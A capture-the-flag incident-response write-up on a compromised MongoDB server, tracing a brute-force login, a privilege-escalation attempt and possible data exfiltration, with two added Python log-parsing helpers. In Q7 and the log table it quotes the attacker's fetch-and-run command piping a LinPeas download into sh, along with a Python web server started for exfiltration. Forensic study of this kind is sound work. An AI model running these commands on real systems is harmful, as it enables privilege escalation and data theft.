HTB Sherlock - MangoBleed
Author: Alcidius
March 04, 2026
Scenario
You were contacted early this morning to handle a high‑priority incident involving a suspected compromised server. The host, mongodbsync, is a secondary MongoDB server. According to the administrator, it’s maintained once a month, and they recently became aware of a vulnerability referred to as MongoBleed. As a precaution, the administrator has provided you with root-level access to facilitate your investigation.
You have already collected a triage acquisition from the server using UAC. Perform a rapid triage analysis of the collected artifacts to determine whether the system has been compromised, identify any attacker activity (initial access, persistence, privilege escalation, lateral movement, or data access/exfiltration), and summarize your findings with an initial incident assessment and recommended next steps.
Summary: An unknown attacker likely exploited the MongoDB server. The task is to investigate the UAC triage artifacts to confirm the breach, trace the attacker's actions (initial access, persistence, privilege escalation, lateral movement, and data exfiltration), and provide an incident assessment with next steps.
Challenge Info
| Field | Details |
|---|---|
| Category | DFIR |
| Difficulty | Very easy |
Investigation
Initial Analysis
The UAC artefact contains:
├── uac-mongodbsync-linux-triage
│ ├── bodyfile
│ ├── hash_executables
│ ├── live_response
│ ├── [root]
│ └── system
I started by looking into the [root] directory, specifically the wtmp file at [root]/var/log/wtmp, to find out who had successfully logged into the machine.
Successful login
From the wtmp file, it appears that at 2025-12-29 05:40:03 UTC a successful login from 65.0.76.43 was made as user mongoadmin. Delving deeper into [root]/var/log/mongodb/mongod.log, this IP is associated with a brute-force attack that started at 2025-12-29 05:25:52.
Privilege escalation
Looking at the user's .bash_history, the attacker ran whoami and then downloaded LinPeas, a privilege escalation tool for Linux.
Extraction
After running LinPeas, the attacker changed directory to /var/lib/mongodb. The attacker also installed zip and started a Python http.server, indicating that data extraction (exfiltration) may have occurred.
Questions & Answers
Q1: What is the CVE ID designated to the MongoDB vulnerability explained in the scenario?
Answer: CVE-2025-14847
Reasoning: MongoDB suffered from a critical flaw that allows unauthenticated remote attackers to gain access to the system.
Q2: What is the version of MongoDB installed on the server that the CVE exploited?
Answer: 8.0.16
Reasoning: Running `rg "buildInfo" ./uac-mongodbsync-linux-triage/\[root\]/var/log/mongodb/mongod.log` against the log shows that the version is 8.0.16, which appears to be vulnerable to CVE-2025-14847.
Q3: Analyze the MongoDB logs to identify the attacker’s remote IP address used to exploit the CVE.
Answer: 65.0.76.43
Reasoning: The wtmp file logged a successful login from IP 65.0.76.43. Cross-referencing this IP with mongod.log shows an automated brute-force attack, given how quickly the login attempts follow one another.
Q4: Based on the MongoDB logs, determine the exact date and time the attacker’s exploitation activity began (the earliest confirmed malicious event)
Answer: 2025-12-29 05:25:52
Reasoning: Both the mongod.log file, as well as the auth.log file, confirm that the brute force attack from 65.0.76.43 commenced at the time in UTC mentioned above.
Q5: Using the MongoDB logs, calculate the total number of malicious connections initiated by the attacker.
Answer: 75260
Reasoning: Running `rg "65.0.76.43" ./uac-mongodbsync-linux-triage/\[root\]/var/log/mongodb/mongod.log | wc -l` counts the log lines mentioning the attacker's address, i.e. the number of connection attempts, which gives the figure above.
Q6: The attacker gained remote access after a series of brute‑force attempts. The attack likely exposed sensitive information, which enabled them to gain remote access. Based on the logs, when did the attacker successfully gain interactive hands-on remote access?
Answer: 2025-12-29 05:40:03
Reasoning: The WTMP file logged the successful login at the time mentioned above in UTC. The login occurred on user mongoadmin.
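The wtmp evidence behind Q3 and Q6 can also be read without last or utmpdump. The following is an added example, not part of the original writeup, of a minimal parser for the fixed-size utmp records in a Linux x86_64 wtmp file (layout per utmp(5) and bits/utmp.h: 384 bytes per record, little-endian, 32-bit tv_sec). It lists USER_PROCESS records, i.e. successful logins, with user, tty, source host and UTC time. The sample file is constructed in code with the writeup's values (mongoadmin, 65.0.76.43, 2025-12-29 05:40:03 UTC); the pid and tty are made up.

```python
"""Minimal wtmp parser for Linux x86_64 (glibc) utmp records.

Added example for this writeup, not UAC's or the author's code. Layout per
utmp(5) / bits/utmp.h: 384 bytes per record, little-endian, 32-bit tv_sec.
The sample file is constructed below with the writeup's values; pid/tty made up.
"""
import struct
from datetime import datetime, timezone

# ut_type, (2 pad), ut_pid, ut_line[32], ut_id[4], ut_user[32], ut_host[256],
# ut_exit{e_termination, e_exit}, ut_session, ut_tv{tv_sec, tv_usec},
# ut_addr_v6[4], 20 reserved bytes
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS = 7   # a normal interactive login session
DEAD_PROCESS = 8   # that session's end


def _cstr(raw: bytes) -> str:
    """Decode a NUL-padded C string field."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_wtmp(data: bytes) -> list:
    """Return one dict per complete record; a trailing partial record is ignored."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        fields = struct.unpack(UTMP_FMT, data[off:off + UTMP_SIZE])
        ut_type, pid, line, _id, user, host, _term, _exit, _sess, tv_sec, _usec = fields[:11]
        records.append({
            "type": ut_type,
            "pid": pid,
            "line": _cstr(line),
            "user": _cstr(user),
            "host": _cstr(host),
            "time": datetime.fromtimestamp(tv_sec, tz=timezone.utc),
        })
    return records


def successful_logins(data: bytes) -> list:
    """USER_PROCESS records are what `last` prints as logins."""
    return [r for r in parse_wtmp(data) if r["type"] == USER_PROCESS]


def make_record(ut_type, pid, line, user, host, when: datetime) -> bytes:
    """Pack one record; used here only to construct the sample wtmp."""
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, int(when.timestamp()), 0, 0, 0, 0, 0)


# Constructed sample: the login from the writeup followed by its logout.
SAMPLE_WTMP = (
    make_record(USER_PROCESS, 4242, "pts/0", "mongoadmin", "65.0.76.43",
                datetime(2025, 12, 29, 5, 40, 3, tzinfo=timezone.utc))
    + make_record(DEAD_PROCESS, 4242, "pts/0", "", "",
                  datetime(2025, 12, 29, 6, 2, 0, tzinfo=timezone.utc))
)

if __name__ == "__main__":
    for r in successful_logins(SAMPLE_WTMP):
        print(r["time"].strftime("%Y-%m-%d %H:%M:%S"), r["user"], r["line"], r["host"])
```

To use it on the acquisition, pass the bytes of [root]/var/log/wtmp to successful_logins. The layout is the 64-bit glibc one; 32-bit systems and other libcs use a different record size, so confirm that the file length is a multiple of UTMP_SIZE before trusting the output.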
Q7: Identify the exact command line the attacker used to execute an in‑memory script as part of their privilege‑escalation attempt.
Answer: curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Reasoning: The .bash_history of user mongoadmin logged this command. LinPeas is a known penetration testing tool used to escalate privileges on Linux machines.
Q8: The attacker was interested in a specific directory and also opened a Python web server, likely for exfiltration purposes. Which directory was the target?
Answer: /var/lib/mongodb
Reasoning: The .bash_history of user mongoadmin logged a cd command into /var/lib/mongodb followed by the start of a Python web server. This indicates that data extraction may have taken place.
Key Takeaways
- rg or "ripgrep" is a very useful tool to extract text from several different log files.
- mongod.log files save logs in JSON. This can be prettified with jq.
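Because mongod.log is one JSON object per line, the questions answered above with rg (Q2, Q4 and Q5) can also be answered by parsing the log directly. The following is an added example, not part of the original writeup and not MongoDB's or UAC's code: it reads the JSON-lines format, skips lines that are not JSON, and pulls out the version from the buildInfo entry, the earliest connection from a given address and the number of connections that address opened. The log lines are constructed to imitate the real layout; the address, version and timestamps are the ones from the writeup, the connection ids and the 10.0.0.5 client are made up.

```python
"""Triage helpers for MongoDB's JSON-lines mongod.log.

Added example for this writeup, not MongoDB's or UAC's own code. The sample
below is constructed to imitate the real structured-logging layout
(t / s / c / id / ctx / msg / attr); the address, version and timestamps are
those from the writeup, the connection ids and the 10.0.0.5 client are made up.
"""
import json
from datetime import datetime

SAMPLE_LOG = """\
{"t":{"$date":"2025-12-29T05:11:47.713+00:00"},"s":"I","c":"CONTROL","id":23403,"ctx":"initandlisten","msg":"Build Info","attr":{"buildInfo":{"version":"8.0.16","gitVersion":"0000000"}}}
{"t":{"$date":"2025-12-29T05:25:52.101+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"Connection accepted","attr":{"remote":"65.0.76.43:35340","uuid":"u1","connectionId":10,"connectionCount":1}}
{"t":{"$date":"2025-12-29T05:25:52.104+00:00"},"s":"I","c":"NETWORK","id":22944,"ctx":"conn10","msg":"Connection ended","attr":{"remote":"65.0.76.43:35340","uuid":"u1","connectionId":10,"connectionCount":0}}
{"t":{"$date":"2025-12-29T05:25:52.250+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"Connection accepted","attr":{"remote":"65.0.76.43:35342","uuid":"u2","connectionId":11,"connectionCount":1}}
{"t":{"$date":"2025-12-29T05:26:01.000+00:00"},"s":"I","c":"NETWORK","id":22943,"ctx":"listener","msg":"Connection accepted","attr":{"remote":"10.0.0.5:51000","uuid":"u3","connectionId":12,"connectionCount":2}}
this line is not JSON and must be skipped
"""


def parse_entries(text):
    """Return one dict per valid JSON line; anything else is skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            entries.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # truncated or non-JSON line (common at the end of a live log)
    return entries


def entry_time(entry):
    """mongod writes {"t": {"$date": "...+00:00"}}; return it as an aware datetime."""
    return datetime.fromisoformat(entry["t"]["$date"].replace("Z", "+00:00"))


def remote_host(entry):
    """Client address without the port, for entries that carry attr.remote."""
    remote = entry.get("attr", {}).get("remote")
    if not remote:
        return None
    return remote.rsplit(":", 1)[0]  # works for IPv4 and for [v6]:port


def server_version(entries):
    """Version from the 'Build Info' entry (what rg "buildInfo" finds)."""
    for e in entries:
        version = e.get("attr", {}).get("buildInfo", {}).get("version")
        if version:
            return version
    return None


def accepted_connections(entries, ip):
    """'Connection accepted' entries from the given address, one per connection."""
    return [e for e in entries
            if e.get("msg") == "Connection accepted" and remote_host(e) == ip]


def first_seen(entries, ip):
    """Earliest accepted connection from the address (Q4's 'earliest event')."""
    conns = accepted_connections(entries, ip)
    return min(entry_time(e) for e in conns) if conns else None


def lines_mentioning(text, ip):
    """Same count as rg "<ip>" mongod.log | wc -l: accepts and ends both counted."""
    return sum(1 for line in text.splitlines() if ip in line)


def triage(text, ip):
    """Summarise version, connection count and first-seen time for one address."""
    entries = parse_entries(text)
    seen = first_seen(entries, ip)
    return {
        "version": server_version(entries),
        "connections": len(accepted_connections(entries, ip)),
        "lines_mentioning_ip": lines_mentioning(text, ip),
        "first_seen_utc": seen.strftime("%Y-%m-%d %H:%M:%S") if seen else None,
    }


if __name__ == "__main__":
    print(triage(SAMPLE_LOG, "65.0.76.43"))
```

Note the two counts: lines_mentioning reproduces the rg | wc -l figure, which includes both the "Connection accepted" and "Connection ended" line of each connection, while accepted_connections counts each connection once. When reporting the number of connection attempts, state which of the two you used.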
Logs Used
| Timestamp | Source | Details | Remarks |
|---|---|---|---|
| 2025-12-29T05:11:47.713Z | mongod.log | "version": "8.0.16" | Version of the Mongo instance |
| 2025-12-29T05:25:52Z | mongod.log | "remote": "65.0.76.43:35340" | Start of the brute-force attack |
| 2025-12-29T05:40:03Z | auth.log / wtmp | systemd-logind[678]: New session 10 of user mongoadmin. | The attacker logged into the machine |
| UNKNOWN | .bash_history | curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | Downloads LinPeas for privilege escalation |
| UNKNOWN | .bash_history | python3 -m http.server 6969 | Provides the possibility of extraction of data |